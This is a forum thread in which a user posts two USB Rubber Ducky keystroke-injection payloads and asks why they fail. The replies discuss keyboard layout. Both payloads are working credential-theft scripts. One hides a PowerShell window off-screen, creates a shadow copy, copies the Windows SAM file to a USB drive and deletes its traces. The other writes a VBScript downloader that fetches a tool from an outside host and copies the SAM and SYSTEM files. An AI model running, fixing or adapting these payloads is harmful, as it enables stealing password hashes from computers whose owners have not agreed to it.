Jump to content

Retrieve SAM file not working. Please help.


Recommended Posts

I tried both of the following scripts but they aren't working. Can someone please fix these or provide another way to use Systemshadowcopy?

DELAY 1150
GUI r
DELAY 1150
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1150
ALT y
DELAY 1150
ENTER
ALT SPACE
DELAY 1150
STRING m
DELAY 1150
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER 
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
ENTER
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
ENTER
STRING $addSlash  = $shadow.DeviceObject + ''
ENTER
STRING cmd /c mklink C:\shadowcopy $addSlash
ENTER
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
ENTER
STRING Remove-Item -recurse -force 'C:\shadowcopy'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY  1150
STRING C:\Windows\config-e466a.ps1
ENTER
DELAY 1150
ALT F4
DELAY 1150
GUI r
DELAY 1150
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1150
ALT y
DELAY 1150
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1150
STRING m
DELAY 1150
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1150
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO>
ENTER
DELAY 200
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing 
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.
Link to comment
Share on other sites

Hi,

I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using?

I am using english on a us keyboard. For the first script I did not see any sam file in the userprofile directory.

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...